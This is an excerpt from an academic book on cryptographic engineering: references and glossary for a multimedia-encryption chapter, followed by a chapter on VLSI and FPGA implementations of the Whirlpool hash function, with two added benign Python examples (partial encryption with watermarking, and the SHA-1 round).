Tikkanen, K., Hannikainen, M., Hamalainen, T., & Saarinen, J. (2000). Hardware implementation of the improved WEP and RC4 encryption algorithms for wireless terminals. In Proceedings of European Signal Processing Conference (pp. 2289-2292).

Tosun, A., & Feng, W. (2000). Efficient multi-layer coding and encryption of MPEG video streams. IEEE International Conference on Multimedia and Expo, 1, 119-122.

Tosun, A., & Feng, W. (2001a). Lightweight security mechanisms for wireless video transmission. In Proceedings of International Conference on Information Technology: Coding and Computing, Las Vegas, NV (pp. 157-161).

Tosun, A., & Feng, W. (2001b). On error preserving encryption algorithms for wireless video transmission. In Proceedings of the ACM International Multimedia Conference and Exhibition, Ottawa, Ontario, Canada (pp. 302-308). Elsevier Engineering Information Inc.

Wee, S., & Apostolopoulos, J. (2001). Secure scalable video streaming for wireless networks. In Proceedings of the IEEE International Conference on Acoustics, Speech, and Signal Processing, 4, 2049-2052.



Wee, S., & Apostolopoulos, J. (2003). Secure scalable streaming and secure transcoding with JPEG-2000. IEEE International Conference on Image Processing, 1, 205-208.

Wen, J., Severa, M., Zeng, W., Luttrell, M. H., & Weiyin, J. (2002). A format-compliant configurable encryption framework for access control of video. IEEE Transactions on Circuits and Systems for Video Technology, 12(6), 545-557.

Wu, C., & Kuo, C. (2000). Fast encryption methods for audiovisual data confidentiality. Proceedings of SPIE, 4209, 284-295.

Wu, C., & Kuo, C. (2001). Efficient multimedia encryption via entropy codec design. Proceedings of SPIE, 4314, 128-138.

Wu, M., Trappe, W., Wang, Z., & Liu, K. (2004). Collusion-resistant fingerprinting for multimedia. IEEE Signal Processing Magazine, 21(2), 15-27.

Wu, Y. (2005). Linear combination collusion attack and its application on an anti-collusion fingerprinting. In Proceedings of the IEEE International Conference on Audio, Speech and Signal Processing (ICASSP'05) (pp. 13-16).

Zeng, W., Zhuang, X., & Lan, J. (2004). Network friendly media security rationales, solutions, and open issues. In Proceedings of the International Conference on Image Processing (ICIP 2004) (pp. 565-568).

Zhao, H., Wang, Z., & Liu, K. (2005). Forensic analysis of nonlinear collusion attacks for multimedia fingerprinting. IEEE Transactions on Image Processing, 14(5), 646-661.

Zhu, B., Yuan, C., Wang, Y., & Li, S. (2005). Scalable protection for MPEG-4 fine granularity scalability. IEEE Transactions on Multimedia, 7(2), 222-233.

Key Terms

Commutative Watermarking and Encryption: Commutative watermarking and encryption is a watermarking-encryption pair that supports exchanging the order of the encryption algorithm and the watermarking algorithm. Thus, the media data can either be watermarked and then encrypted, or encrypted and then watermarked.

Digital Watermarking: Digital watermarking is the technology to embed information into the original data by modifying parts of the data. The produced data are still usable, and the embedded information can be detected or extracted from them.

Format Compliant Encryption: Format compliant encryption is the multimedia encryption method that keeps the format information unchanged. In this method, the encrypted media data can be decoded or browsed by a general decoder or player.

Joint Fingerprint Embedding and Decryption: Joint fingerprint embedding and decryption is the technology to implement fingerprint embedding and data decryption at the same time. The input is the encrypted media copy, while the output is the decrypted media copy with a unique fingerprint, for example, the customer ID.

Partial Encryption: Partial encryption is the encryption method that encrypts only parts of the original data while leaving the other parts unchanged. In this method, traditional ciphers can be used to encrypt the selected parts.

Robust Watermarking: Robust watermarking is the watermarking algorithm that can survive not only general operations such as compression, adding noise, filtering, A/D or D/A conversion, and so forth, but also geometric attacks such as rotation, scaling, translation, shearing, and so forth. It is often used in ownership protection.

Scalable Encryption: Scalable encryption is the multimedia encryption method that keeps the scalability of progressive or scalable media data. Scalable media data can be produced by such codecs as JPEG2000, MPEG4, scalable video coding (SVC), and so on.
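The key terms above define partial encryption and commutative watermarking and encryption, and the open-issues discussion earlier notes that separating decryption from watermarking is a security weakness. The following Python program is an added example, not code from the chapter or from any of the cited schemes: it builds one concrete commutative pair from partial encryption. Bits 1 to 7 of each sample are XORed with a keystream (here derived with HMAC-SHA256 in counter mode, an assumption of this example chosen so it runs offline), while bit 0 is left untouched as the watermark channel. Because the two operations touch disjoint bits, watermark-then-encrypt and encrypt-then-watermark give identical output, and the customer ID can be read back from either the ciphertext or the decrypted copy. The sample "media" and key material are constructed values.

```python
"""Added example: a commutative watermarking/encryption pair built from partial
encryption. Not from the chapter; the HMAC-SHA256 counter-mode keystream is an
illustrative assumption, standing in for a production stream cipher."""
import hashlib
import hmac
from typing import List


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Derive `length` pseudo-random bytes from HMAC-SHA256(key, nonce || counter)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def partial_encrypt(samples: bytes, key: bytes, nonce: bytes) -> bytes:
    """Partial encryption: XOR bits 1..7 of every sample, leave bit 0 (the LSB)
    untouched as the watermark channel. XOR is an involution, so this also decrypts."""
    ks = keystream(key, nonce, len(samples))
    return bytes(s ^ (k & 0xFE) for s, k in zip(samples, ks))


def embed_watermark(samples: bytes, mark_bits: List[int]) -> bytes:
    """LSB watermark: write one mark bit per sample, repeating the mark as needed."""
    out = bytearray(samples)
    for i in range(len(out)):
        out[i] = (out[i] & 0xFE) | (mark_bits[i % len(mark_bits)] & 1)
    return bytes(out)


def extract_watermark(samples: bytes, nbits: int) -> List[int]:
    """Read the first nbits LSBs back; needs no key, since the LSBs are not encrypted."""
    return [s & 1 for s in samples[:nbits]]


def id_to_bits(customer_id: int, nbits: int = 8) -> List[int]:
    return [(customer_id >> (nbits - 1 - i)) & 1 for i in range(nbits)]


def bits_to_id(bits: List[int]) -> int:
    value = 0
    for b in bits:
        value = (value << 1) | (b & 1)
    return value


def demo(customer_id: int = 0xA5) -> dict:
    """Run both operation orders on constructed data and report what a verifier sees."""
    media = bytes((17 * i + 5) % 256 for i in range(32))   # constructed 8-bit samples
    key, nonce = b"k" * 32, b"n" * 8                        # constructed key material
    mark = id_to_bits(customer_id)

    wm_then_enc = partial_encrypt(embed_watermark(media, mark), key, nonce)
    enc_then_wm = embed_watermark(partial_encrypt(media, key, nonce), mark)
    decrypted = partial_encrypt(wm_then_enc, key, nonce)   # same call decrypts

    return {
        # the defining property of a commutative pair
        "commutes": wm_then_enc == enc_then_wm,
        # fingerprint is readable without the decryption key ...
        "id_from_ciphertext": bits_to_id(extract_watermark(wm_then_enc, 8)),
        # ... and survives decryption unchanged
        "id_from_plaintext": bits_to_id(extract_watermark(decrypted, 8)),
        # decryption restores every bit except the watermark channel
        "only_lsb_changed": all(((m ^ d) & 0xFE) == 0 for m, d in zip(media, decrypted)),
        # the encrypted part really is masked
        "upper_bits_hidden": any(((m ^ c) & 0xFE) != 0 for m, c in zip(media, wm_then_enc)),
    }


if __name__ == "__main__":
    print(demo())
```

The same property that makes the pair commutative, a watermark channel the cipher never touches, also means the fingerprint can be read or overwritten by anyone holding the ciphertext; robust watermarking and joint fingerprint embedding and decryption, both defined above, are the chapter's answers to that trade-off.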




Chapter XVII
System-on-Chip Design of
the Whirlpool Hash Function
Paris Kitsos
Hellenic Open University (HOU), Patras, Greece

Abstract

In this chapter, a system-on-chip design of the newest powerful standard in the hash families, named Whirlpool, is presented. In more detail, an architecture and two very large-scale integration (VLSI) implementations are presented. The first implementation is suitable for high speed applications while the second one is suitable for applications with constrained silicon area resources. The architecture permits a wide variety of implementation tradeoffs. Different implementations have been introduced and each specific application can choose the appropriate speed-area trade-off implementation. The implementations are examined and compared in terms of security level and of performance expressed in hardware terms. Whirlpool, together with the RIPEMD, SHA-1, and SHA-2 hash functions, is adopted by the International Organization for Standardization (ISO/IEC, 2003) 10118-3 standard. The Whirlpool implementations allow fast execution and effective substitution of any previous hash families' implementations in any cryptography application.

Introduction

Nowadays many financial and other electronic transactions are growing exponentially and they play an important role in our life. All these transactions have integrated data authentication processes. In addition, many applications like the public key infrastructure (PKI) (Adams & Farrell, 1999; National Institute of Standards and Technology [NIST, 2005, http://csrc.nist.gov/publications/nistpubs/800-77/sp800-77.pdf]) and many mobile communications include authentication services. All the aforementioned applications have an integrated authentication module, including a hash function embedded in the system's implementation.

A hash function is a function that maps an input of arbitrary length into a fixed number of output bits, the hash value.

One of the most widely used hash functions is RIPEMD (Dobbertin, Bosselaers, & Preneel, 1996). There are two different RIPEMD versions, RIPEMD-128 and RIPEMD-160, with similar design philosophy but different word length of the produced message digest (128- and 160-bit,

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
System-on-Chip Design of the Whirlpool Hash Function

respectively). In August 2002, NIST announced the updated Federal Information Processing Standard (FIPS 180-2), which introduced three new hash functions referred to as SHA-2 (256, 384, 512). In addition, the New European Schemes for Signatures, Integrity, and Encryption (NESSIE) (2004) project was responsible for introducing a hash function with a high security level. In February 2003, it was announced that the hash function included in the NESSIE portfolio is Whirlpool (Barreto & Rijmen, 2003). Finally, the best known hash function is the secure hash algorithm-1 (SHA-1) (NIST, 1995, http://itl.nist.gov/fipspub/fip180-1.htm). However, some security problems have been raised, as has already been shown (see Wang, Yin, & Yu, 2005). A collision of SHA-1 can be found with complexity less than 2^69 hash operations. This is the first attack on the full 80-step SHA-1 with complexity less than the 2^80 theoretical bound. A collision in SHA-1 would cast doubt over the future viability of any system that relies on SHA-1. The result will cause significant confusion, it will require the reengineering of many systems, and it will create incompatibility between new systems and old. In addition, the National Security Agency (NSA) did not disclose the SHA-2 design criteria, and its design philosophy is similar to the design of the SHA-1 function. So, the attack against SHA-1 will probably affect the SHA-2 function as well. The same issue holds for the RIPEMD hash family. On the other hand, the internal structure of Whirlpool is different from the structure of all the aforementioned hash functions. So, the Whirlpool function does not suffer from that kind of problem, which makes it a very good choice for electronics applications.

All the afore-mentioned hash functions are adopted by the International Organization for Standardization (ISO, 2003) 10118-3 standard.

In this chapter, an architecture and two VLSI implementations of the new hash function, Whirlpool, are proposed. The first implementation is suitable for high speed applications while the second one is suitable for applications with constrained silicon area resources.

The architecture and the implementations presented here were the first in the scientific literature (Kitsos & Koufopavlou, 2004). Until then, two hardware architectures had also been presented. The first one (McLoone & McCanny, 2002) is a high speed hardware architecture and the second one (Pramstaller, Rechberger, & Rijmen, 2006) is a compact field-programmable gate array (FPGA) architecture and implementation of Whirlpool. Both architectures are efficient for specific applications; analytical comparisons with the proposed implementations will be given in the rest of this chapter. In addition, comparisons with other hash families' implementations (Ahmad & Shoba Das, 2005; Deepakumara, Heys, & Venkatesam, 2001; Dominikus, 2002; Grembowski et al., 2002; McLoone, McIvor, & Savage, 2005; Sklavos & Koufopavlou, 2003, 2005; Yiakoumis, Papadonikolakis, Michail, Kakarountas, & Goutis, 2005) are provided. From the comparison results it is proven that the proposed implementation performs better and composes an effective substitution of any previous hash families' implementations, such as MD5, RIPEMD-160, SHA-1, SHA-2, and so forth, in all the cases.

The organization of the chapter is the following: In the second section, fundamentals of the hash function families are presented. First, the (ISO/IEC) 10118-3 standard is briefly described, and secondly the Whirlpool hash function specifications are defined. In the third section, the proposed architecture and VLSI implementations are presented. Implementation results and discussion (comparison with other works) are reported in the fourth section. Finally, the fifth section concludes this chapter.

Fundamentals for Hash Functions

In this section a brief description of the ISO/IEC 10118-3 standard is presented. This standard specifies dedicated hash functions. The hash functions are based on the iterative use of a round-function. Seven distinct round functions are specified, giving rise to distinct dedicated hash-functions. Six of them are briefly described and at last, Whirlpool is described in detail.



Figure 1. The SHA-1 round function (diagram: state words X0 to X4 before round i; round function f_i, circular left shifts S^5 and S^30, message schedule word Z_i and constant C_i, combined by modular additions into the word W; state words X0 to X4 after round i)
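Figure 1 sketches the SHA-1 round (five 32-bit state words, a round function f_i, the shifts S^5 and S^30, the message schedule word Z_i and the constant C_i), which the subsection that follows walks through. As an added example, not code from the chapter, here is that round in Python, wrapped in the padding and message schedule of FIPS 180-1 (those two pieces are this example's assumptions, not text from the chapter) so that the complete hash can be checked against Python's hashlib. The names A to E, W_i and K_i are the FIPS names for the figure's X0 to X4, Z_i and C_i. The same "iterated round-function" structure the standard describes underlies the SHA-2 and RIPEMD round functions discussed below.

```python
"""Added example: the SHA-1 round function of Figure 1, plus the FIPS 180-1 padding
and message schedule needed to turn it into the full hash. Not code from the chapter."""
import hashlib
import struct

MASK = 0xFFFFFFFF


def rotl(x: int, n: int) -> int:
    """Circular left shift of a 32-bit word (S^n in Figure 1)."""
    return ((x << n) | (x >> (32 - n))) & MASK


def f(i: int, b: int, c: int, d: int) -> int:
    """Round function f_i, 0 <= i <= 79: three words in, one word out."""
    if i < 20:
        return (b & c) | (~b & d & MASK)      # Ch
    if i < 40:
        return b ^ c ^ d                      # Parity
    if i < 60:
        return (b & c) | (b & d) | (c & d)    # Maj
    return b ^ c ^ d                          # Parity


def k(i: int) -> int:
    """Round constant C_i of Figure 1 (K_t in FIPS 180-1), one per 20-round stage."""
    return (0x5A827999, 0x6ED9EBA1, 0x8F1BBCDC, 0xCA62C1D6)[i // 20]


def sha1_round(i: int, state: tuple, w_i: int) -> tuple:
    """One round of Figure 1: (X0..X4 before round i) -> (X0..X4 after round i).
    w_i is the message schedule word Z_i supplied by the padding unit."""
    a, b, c, d, e = state
    t = (rotl(a, 5) + f(i, b, c, d) + e + w_i + k(i)) & MASK
    return (t, a, rotl(b, 30), c, d)


def message_schedule(block: bytes) -> list:
    """Expand one 64-byte block into the 80 schedule words W_0..W_79."""
    w = list(struct.unpack(">16I", block))
    for t in range(16, 80):
        w.append(rotl(w[t - 3] ^ w[t - 8] ^ w[t - 14] ^ w[t - 16], 1))
    return w


def sha1(message: bytes) -> str:
    """Full SHA-1: pad, then run 80 rounds per block and feed the result forward."""
    h = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)
    bit_len = len(message) * 8
    padded = message + b"\x80" + b"\x00" * ((55 - len(message)) % 64) + struct.pack(">Q", bit_len)
    for off in range(0, len(padded), 64):
        w = message_schedule(padded[off:off + 64])
        state = h
        for i in range(80):
            state = sha1_round(i, state, w[i])
        h = tuple((x + y) & MASK for x, y in zip(h, state))   # chaining value
    return "".join(f"{x:08x}" for x in h)


def matches_hashlib(message: bytes) -> bool:
    """Cross-check the round-by-round implementation against the library routine."""
    return sha1(message) == hashlib.sha1(message).hexdigest()


if __name__ == "__main__":
    print(sha1(b"abc"), matches_hashlib(b"abc"))
```

The test vector for "abc" (a9993e36 4706816a ba3e2571 7850c26c 9cd0d89d) is the one published with FIPS 180-1; a multi-block input exercises the chaining between blocks that a single-block vector does not.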

Dedicated Hash Functions

In each SHA-1 round, a hash operation is performed that takes as inputs five 32-bit variables and two extra 32-bit words. The first extra word is the message schedule word, Zi, which is provided by the padding unit, and the other is a constant, Ci, predefined by the standard. Figure 1 shows the diagram of the SHA-1 round function. The sequence of functions f0, f1, ..., f79 is used in this round-function, where each function fi, 0 ≤ i ≤ 79, takes three words X1, X2 and X3 as input and produces a single word as output. The operations S^5 and S^30 mean circular left shift by 5-bit and 30-bit positions respectively.

The algorithm for generation of the message digest is identical for SHA-256 and SHA-512; only the constants (Ci) and the functions they use, ei and di, differ (the functions ei are used by SHA-256 and the functions di by SHA-512), and hence SHA-256 and SHA-512 are discussed simultaneously. The diagram of the SHA-256 and SHA-512 round function is depicted in Figure 2. When a message of any length < 2^64 bits, for SHA-256, or < 2^128 bits, for SHA-512, is input, the hash functions SHA-256 and SHA-512 compute the message digest. The message digests generated by SHA-256 and SHA-512 are 256 and 512 bits long, respectively. The procedure consists of two stages, namely, preprocessing and hash computation. In

Figure 2. The SHA-256 and SHA-512 round function (diagram: state words X0 to X7; functions e0 to e3 for SHA-256 or d0 to d3 for SHA-512, message schedule word Zi and constant Ci, combined by modular additions into the intermediate words W1 and W2; state words X0 to X7 after the round)



the preprocessing stage, the message is padded, parsed into m-bit blocks, and the initialization values are set for the hash computation. A message scheduler divides the m-bit block into 16 words and prepares a message schedule by passing one word at a time. A series of hash values is generated iteratively from functions, constants, and word operations, and the final hash value is used as the message digest. SHA-256 requires 64 transformation steps (round-functions) while SHA-512 requires 80 round function transformations.

SHA-384 uses exactly the same round function as SHA-512 and requires 80 round function transformations. Only the initialization values are different. The 384-bit message digest is obtained by truncating the SHA-512-based hash output to its left-most 384 bits.

RIPEMD-160 and RIPEMD-128 replace the previously published version of RIPEMD and overcome the security problems that it raised (see Dobbertin, 1997). The main design principle of both hash functions is to maximize the confidence gained by RIPEMD, but with as few changes as possible to the original structure. The produced message digest ranges in length from 128 to 160 bits, depending on the selected hash function. These hash functions enable the determination of a message's integrity. Any change to the message will, with a very high probability, result in a different message digest.

The round-function of RIPEMD-160 is described in terms of operations on 32-bit words. A sequence of functions g0, g1, ..., g79 is used in this round-function, where each function gi, 0 ≤ i ≤ 79, takes three words X1, X2 and X3 as input and produces a single word as output. Two sequences of constant words C0, C1, ..., C79 and C'0, C'1, ..., C'79 are used in this round-function. Besides, two sequences of 80 shift-values are used in this round-function, where each shift-value is between 5 and 15. The diagram of the RIPEMD-160 round function is illustrated in Figure 3.

As Figure 4 shows, the round-function of RIPEMD-128 is described in terms of operations on 32-bit words. A sequence of functions g0, g1, ..., g63 is used in this round-function, where each function gi, 0 ≤ i ≤ 63, takes three words X1, X2 and X3 as input and produces a single word as output. Two sequences of constant words C0, C1, ..., C63 and C'0, C'1, ..., C'63 are used in this round-function. Two sequences of 64 shift-values are also used in this round-function, where each shift-value is between 5 and 15.

Whirlpool Hash Function Specifications

Whirlpool is a one-way, collision resistant 512-bit hash function operating on messages less than 2^256 bits in length. It consists of the iterated application

Figure 3. The RIPEMD-160 round function (diagram: state words X0 to X4 before round i; function gi, circular shifts S^ti and S^10, modular addition into the word W; state words X0 to X4 after round i)

Figure 4. The RIPEMD-128 round function (diagram: state words X0 to X3 before round i; function gi, message word Zai, constant Ci, circular shift S^ti, modular addition into the word W; state words X0 to X3 after round i)

of a compression function, based on an underlying dedicated 512-bit block cipher that uses a 512-bit key. Whirlpool is a Merkle hash function (Menezes, Van Oorschot, & Vanstone, 1997) based on a 512-bit block cipher, W, using a chained 512-bit key state, both derived from the input data. The round function of W operates in the Miyaguchi-Preneel mode (Menezes et al.) as shown in Figure 5.

As Figure 5 shows, a 512-bit data block, mi, with a 512-bit key, hi-1, is used for the operation of the W block cipher. The output of the block cipher, the original input data block and the input key are all XORed together in order to produce the hash value, hi. This hash value is used as the key for the next input data block.

In the rest of this chapter, the round function of the block cipher W is defined. The block diagram of the W block cipher basic round is depicted in Figure 6. The round function, ρ[k], is based on combined operations from three algebraic functions. These functions are the non-linear layer γ, the cyclical permutation π, and the linear diffusion layer θ. So, the round function is the composite mapping ρ[k], parameterized by the key matrix k, and given by the following equation:

\rho[k] \equiv \sigma[k] \circ \theta \circ \pi \circ \gamma \quad (1)

The symbol "∘" denotes the sequential application of the algebraic functions, where the rightmost function is executed first.

The key addition σ[k] consists of the bitwise addition (XOR) of a key matrix k:

\sigma[k](a) = b \Leftrightarrow b_{ij} = a_{ij} \oplus k_{ij}, \quad 0 \le i, j \le 7 \quad (2)

This mapping is also used to introduce round constants in the key schedule. The input data (hash state) is internally viewed as an 8x8 matrix over GF(2^8). Therefore, a 512-bit data string must be mapped to and from this matrix format. This is done by the function μ:

\mu(a) = b \Leftrightarrow b_{ij} = a_{8i+j}, \quad 0 \le i, j \le 7 \quad (3)

The first transformation of the hash state is the non-linear layer γ, which consists of the parallel application of a non-linear substitution box (S-Box) to every byte of the argument individually. After that, the hash state is passed through the permutation π, which cyclically shifts each column of its argument independently, so that column j is shifted downwards by j positions. The final transformation is the linear diffusion layer θ, in which the hash state is multiplied with a generator matrix. The effect of θ is to mix the bytes in each state row.

So, the dedicated 512-bit block cipher W[K], parameterized by the 512-bit cipher key K, is defined as:

W[K] = \Bigl( \mathop{\bigcirc}_{r=R}^{1} \rho[K^{r}] \Bigr) \circ \sigma[K^{0}] \quad (4)

that is, ρ[K^R] ∘ ... ∘ ρ[K^1] ∘ σ[K^0], with the key addition σ[K^0] applied first,

Figure 5. Whirlpool hash function (diagram: the 512-bit block mi and the 512-bit key hi-1 enter the W block cipher; its output is XORed with mi and hi-1 to give hi)

where the round keys K^0, ..., K^R are derived from K by the key schedule. The default number of rounds is R = 10. The key schedule expands the 512-bit cipher key K into a sequence of round keys K^0, ..., K^R as:

K^{0} = K, \qquad K^{r} = \rho[c^{r}](K^{r-1}), \quad r > 0 \quad (5)

The round constant for the r-th round, r > 0, is a matrix c^r defined by means of the substitution box (S-Box) as:

c^{r}_{0j} \equiv S[8(r-1)+j], \; 0 \le j \le 7; \qquad c^{r}_{ij} \equiv 0, \; 1 \le i \le 7, \; 0 \le j \le 7 \quad (6)

So, Whirlpool iterates the Miyaguchi-Preneel hashing scheme over the t padded blocks mi, 1 ≤ i ≤ t, using the dedicated 512-bit block cipher W:

\eta_i = \mu(m_i), \qquad H_0 = \mu(IV), \qquad H_i = W[H_{i-1}](\eta_i) \oplus H_{i-1} \oplus \eta_i, \quad 1 \le i \le t \quad (7)

where IV (the Initialization Vector) is a string of 512 0-bits.

As Equations 4 and 5 show, the internal block cipher W comprises a data randomizing part and a key schedule part. These parts use the same round function.

Before being subjected to the hashing operation, a message M of bit length L < 2^256 is padded with a 1-bit, then with as few 0-bits as necessary to obtain a bit string whose length is an odd multiple of 256, and finally with the 256-bit right-justified binary representation of L, resulting in the padded message m, partitioned in t blocks m1, m2, ..., mt.

Figure 6. Block diagram of the W basic round with algebraic function transformations (diagram: the 512-bit input state s_{i,j} passes through the non-linear layer, the permutation, the diffusion layer and the XOR with the round key k_{i,j} to give the output state s'_{i,j})

Figure 7. Whirlpool hash function architecture (diagram: the Message and its length n enter the Pad Component over a 256-bit interface; the 512-bit blocks mi and H_{t-1} feed W; W_out is XORed with mi to give H_t)

WHIRLPOOL ARCHITECTURES AND VLSI IMPLEMENTATIONS

In this section the proposed architecture and implementations of the Whirlpool hash function are explained in detail. A general diagram of the architecture that performs the Whirlpool hash function is shown in Figure 7. The Pad Component pads the input data and converts them to an n-bit padded message. In the proposed architecture an interface with a 256-bit input for Message is considered. The input n specifies the total length of the message. The padded message is partitioned into a sequence of t 512-bit blocks m1, m2, ..., mt. This sequence is then used in order to generate a new sequence of 512-bit strings, H1, H2, ..., Ht, in the following way: mi is processed with Hi-1 as key, and the resulting string is XORed with mi in order to produce Hi. H0 is a string of 512 0-bits and Ht is the hash value.

The block cipher W mainly consists of the round function ρ. The implementation of the round function ρ is illustrated in Figure 8. The non-linear layer γ is composed of 64 substitution tables (S-Boxes). The internal structure of the S-Box is shown in Figure 8. It consists of five 4-bit mini boxes E, E^-1, and R. These mini boxes can be implemented either by using look-up tables (LUTs) or Boolean expressions. Next, the cyclical permutation π is implemented by using combinational shifters. These shifters cyclically shift (downwards) each matrix column by a fixed number of positions (equal to j), in one clock cycle. The linear diffusion layer θ is a matrix multiplication between the hash state and a generator matrix. In Barreto and Rijmen (2003) an efficient method is provided in order to implement the matrix multiplication. However, in this chapter an alternative way is proposed which

Equation 8.

b_{i0} = a_{i0} \oplus a_{i1} \oplus a_{i3} \oplus a_{i5} \oplus a_{i7} \oplus X[a_{i2}] \oplus X^{2}[a_{i3} \oplus a_{i6}] \oplus X^{3}[a_{i1} \oplus a_{i4}]
b_{i1} = a_{i0} \oplus a_{i1} \oplus a_{i2} \oplus a_{i4} \oplus a_{i6} \oplus X[a_{i3}] \oplus X^{2}[a_{i4} \oplus a_{i7}] \oplus X^{3}[a_{i2} \oplus a_{i5}]
b_{i2} = a_{i1} \oplus a_{i2} \oplus a_{i3} \oplus a_{i5} \oplus a_{i7} \oplus X[a_{i4}] \oplus X^{2}[a_{i5} \oplus a_{i0}] \oplus X^{3}[a_{i3} \oplus a_{i6}]
b_{i3} = a_{i0} \oplus a_{i2} \oplus a_{i3} \oplus a_{i4} \oplus a_{i6} \oplus X[a_{i5}] \oplus X^{2}[a_{i6} \oplus a_{i1}] \oplus X^{3}[a_{i4} \oplus a_{i7}]
b_{i4} = a_{i1} \oplus a_{i3} \oplus a_{i4} \oplus a_{i5} \oplus a_{i7} \oplus X[a_{i6}] \oplus X^{2}[a_{i7} \oplus a_{i2}] \oplus X^{3}[a_{i5} \oplus a_{i0}]
b_{i5} = a_{i0} \oplus a_{i2} \oplus a_{i4} \oplus a_{i5} \oplus a_{i6} \oplus X[a_{i7}] \oplus X^{2}[a_{i0} \oplus a_{i3}] \oplus X^{3}[a_{i6} \oplus a_{i1}]
b_{i6} = a_{i1} \oplus a_{i3} \oplus a_{i5} \oplus a_{i6} \oplus a_{i7} \oplus X[a_{i0}] \oplus X^{2}[a_{i1} \oplus a_{i4}] \oplus X^{3}[a_{i7} \oplus a_{i2}]
b_{i7} = a_{i0} \oplus a_{i2} \oplus a_{i4} \oplus a_{i6} \oplus a_{i7} \oplus X[a_{i1}] \oplus X^{2}[a_{i2} \oplus a_{i5}] \oplus X^{3}[a_{i0} \oplus a_{i3}]

Figure 8. Implementation of the round function ρ (diagram: 512-bit input; 64 S-boxes, each built from the 4-bit mini boxes E, E^-1 and R; the X, X^2 and X^3 tables combining a_{i1} xor a_{i4}, a_{i3} xor a_{i6}, a_{i2} and a_{i0} xor a_{i1} xor a_{i3} xor a_{i5} xor a_{i7} into the output byte b_{i0}; XOR with the round key σ[k]; 512-bit output)

is suitable for hardware implementation. The transformation expressions of the diffusion layer are given next (see Equation 8). Bytes b_i0, b_i1, b_i2, ..., b_i7 represent the eight bytes of the i-th row of the hash state at the output of the θ layer. Table X implements the multiplication by the polynomial g(x) = x modulo (x^8 + x^4 + x^3 + x^2 + 1) in GF(2^8). Table X^2 is defined as X^2 ≡ X ∘ X and X^3 as X^3 ≡ X ∘ X ∘ X. In Figure 8, the implementation of the output byte b_i0 is depicted in detail. The other bytes are implemented in a similar way. The key addition (σ[k]) consists of eight 2-input XOR gates for every byte of the hash state. Every bit of the round key is XORed with the corresponding bit of the hash state.

The first implementation is depicted in Figure 9. This implementation has two similar parallel data paths, the data randomizing and the key schedule. The implementation details of the non-linear layer γ, the cyclical permutation π, and the linear diffusion layer θ are shown in Figure 8. The input block mi is set to the Input data simultaneously with the initial vector (IV) to the Key. In the key schedule data path, the output data of the θ layer is bitwise XORed with the c^r constant. A round key is produced, on the fly, in one clock cycle. Each produced round key is used in the next clock cycle (through the multiplexer) for the production of the next round key. In the data randomizing data path, the hash state output of the θ layer is bitwise XORed with the appropriate round key. Then, the intermediate feedback data are used as input to the next round (through the multiplexer). After 10 execution rounds the Output Register latches the temp value. This is bitwise XORed with the Hi-1 value in order to compute Wout.

In one clock cycle, one execution round is executed and, simultaneously, the appropriate round key is calculated. The system needs 10 clock cycles per block. If another block mi+1 is required to be transformed, the previous process is repeated (by using the Hi value as cipher key). So, for t blocks the execution time is 10*t clock cycles.

The second implementation of the W block cipher architecture is shown in Figure 10. This implementation is suitable for applications with constrained silicon area resources. The appropriate key schedule part is integrated with the data


Figure 9. The implementation of the W block cipher suitable for high speed applications (diagram: two parallel paths for Input data and Key, each with a multiplexer, an Input Register and a ρ[k] XOR stage; a ROM supplies the constants c^r to the key path; feedback data loops for rounds 1 ≤ r ≤ 10; the Output Register holds temp, which is XORed with H_{i-1} to give W_out)

randomizing part in order to reduce the required hardware resources. The execution of the W block cipher on this implementation is performed in two phases. In the first phase, the round keys are produced and stored in the RAM. In the second phase, the hash value is computed. The algorithm specifies 10 rounds for the hash state. The Input data is the initialization vector (IV), in order to produce the round keys (first phase). The Input Register is used for buffering the algorithm Input data. The output data of the θ layer is bitwise XORed with the c^r constant. Each execution round lasts one clock cycle. After the first execution round, the first round key is stored in the RAM. It is used as input in the second execution round, through the multiplexer (feedback data), for the production of the second round key. This process is repeated 10 times (10 execution rounds) and lasts 10 clock cycles. The c^r constants are predefined and stored in ROM. The multiplexer selects the c^r constants during the first phase and the round keys during the second phase. The computation of the hash value takes place during the second phase. In this phase, the Input data is the mi block. The output data of the θ layer is bitwise XORed with the appropriate round key, which is stored in the RAM. After 10 execution rounds the Output Register latches the temp result. This result is bitwise XORed with the Hi-1 value (in this case equal to the IV) in order to compute Wout. Wout is XORed with mi (see Figure 7), so the final hash value, Hi, is computed.

If another block mi+1 is required to be transformed, the previous process is repeated (by using the Hi value as cipher key). So, for t blocks the execution time is 20*t clock cycles. As a result, the total throughput of this implementation is half that of the first implementation; however, it needs almost half the silicon area.

IMPLEMENTATION RESULTS AND DISCUSSION

The Virtex-4 FPGA device is used in order to evaluate the performance of the proposed implementations. Specifically, the XC4VLX100 device is used; this device belongs to a new family manufactured in 1.2 volts, 90nm triple-oxide technology and offers twice the performance, twice the density, and less than one-half the power consumption of


Figure 10. The implementation of the W block cipher suitable for applications with constrained silicon area resources (diagram: Input data, multiplexer and Input Register; ρ[k] and XOR stage; a ROM holding the constants c^r and a RAM holding the round keys, selected by a multiplexer; feedback data for round r; the Output Register holds temp, which is XORed with H_{i-1} to give W_out)

previous-generation devices. The basic building block of these devices is the DSP48 slice (see Xilinx, 2006). The purpose of this module is to deliver off-the-shelf programmable devices with the best mix of logic, memory, I/O, processors, clock management, and digital signal processing. In Figure 11 the DSP48 slice architecture is depicted. The Virtex-4 DSP slices are organized as vertical DSP columns. Within the DSP column, two vertical DSP slices are combined with extra logic and routing to form a DSP tile. The DSP tile is four CLBs tall. Each DSP48 slice has a two-input multiplier followed by multiplexers and a three-input adder/subtractor. The multiplier accepts two 18-bit, two's complement operands producing a 36-bit, two's complement result. The result is sign extended to 48 bits and can optionally be fed to the adder/subtractor. The adder/subtractor accepts three 48-bit, two's complement operands, and produces a 48-bit two's complement result. Higher level DSP functions are supported by cascading individual DSP48 slices in a DSP48 column. One input (cascade B input bus) and the DSP48 slice output (cascade P output bus) provide the cascade capability. The XC4VLX100 device used in this chapter contains 96 DSP48 slices.

